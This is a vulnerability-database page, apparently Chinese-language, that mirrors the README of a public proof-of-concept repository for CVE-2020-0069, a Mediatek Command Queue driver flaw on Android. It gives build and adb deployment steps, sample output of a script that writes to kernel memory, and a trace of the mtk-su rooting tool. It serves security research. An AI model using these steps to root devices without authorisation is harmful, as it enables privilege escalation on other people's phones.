漏洞平台

POC详情： 25b81145f28103ee880f6e218c17ee200db5040d

来源

https://github.com/quarkslab/CVE-2020-0069_poc

关联漏洞

标题： Google Android Mediatek Command Queue driver 缓冲区错误漏洞 (CVE-2020-0069)
描述：Android是美国谷歌（Google）和开放手持设备联盟（简称OHA）的一套以Linux为基础的开源操作系统。Mediatek Command Queue driver是其中的一个命令队列驱动程序。 Android中的Mediatek Command Queue driver存在缓冲区错误漏洞。攻击者可利用该漏洞提升权限。

介绍

# Description

This repository contains the materials we used to investigate CVE-2020-0069 on a Xiaomi Redmi 6a (with a Mediatek SoC MT6762M).

There are three programs:

 - ``kernel_rw.c`` a C program allowing to read/write kernel memory
 - ``poc.sh`` a shell script 
 - ``syscall_hook.c`` a C library that can be used to trace the program ``mtk-su`` (tested on version 19)

## Build

To build the binaries:

```
$ ndk-build
```

Then push them on the device:

```bash
$ adb push poc.sh /data/local/tmp
$ adb push libs/armeabi-v7a/kernel_rw /data/local/tmp
$ adb push libs/armeabi-v7a/libsyscall_hook.so /data/local/tmp
```

## Usage

### CVE-2020-0069 PoC

```bash
$ uname -a
Linux localhost 4.9.77+ #1 SMP PREEMPT Mon Jan 21 18:32:19 WIB 2019 armv7l
$ sh poc.sh
[+] Found Linux string at 0x4180bc00
[+] Found Linux string at 0x4180bea0
[+] Write the patched value
$ uname -a
minix  4.9.77+ #1 SMP PREEMPT Mon Jan 21 18:32:19 WIB 2019 armv7l
```

### To trace mtk-su

```bash
$ mkdir mtk-su
$ LD_PRELOAD=./syscall_hook.so ./mtk-su
alloc failed
alloc count=400 startPA=0x53df4000
uncatched ioctl 40e07803
exec command (num 0) ( blockSize=8040, readAddress.count=0 ) dumped into cmd-0
exec command (num 1) ( blockSize=3e0, readAddress.count=1e ) dumped into cmd-1
exec command (num 2) ( blockSize=3e0, readAddress.count=1e ) dumped into cmd-2
[...]
$ cat  mtksu/cmd-1
WFE to_wait=1, wait=1, to_update=1, update=0, event=1da
MOVE 40a68000 into reg 17
READ  address reg 17, data reg b
MOVE startPA+0 into reg 17
WRITE  address reg 17, data reg b
[...]
```

文件快照


 [4.0K]  /data/pocs/25b81145f28103ee880f6e218c17ee200db5040d
├── [4.0K]  jni
│   ├── [ 333]  Android.mk
│   ├── [ 102]  Application.mk
│   ├── [ 12K]  kernel_rw.c
│   ├── [4.0K]  mtk
│   │   ├── [ 13K]  cmdq_def.h
│   │   ├── [5.9K]  cmdq_engine_common.h
│   │   ├── [ 19K]  cmdq_event_common.h
│   │   ├── [1.7K]  cmdq_subsys_common.h
│   │   ├── [3.4K]  cmdq_v3_driver.h
│   │   └── [1.3K]  mtk-cmdq.h
│   └── [8.1K]  syscall_hook.c
├── [ 11K]  LICENSE
├── [ 938]  poc.sh
└── [1.5K]  README.md

2 directories, 13 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。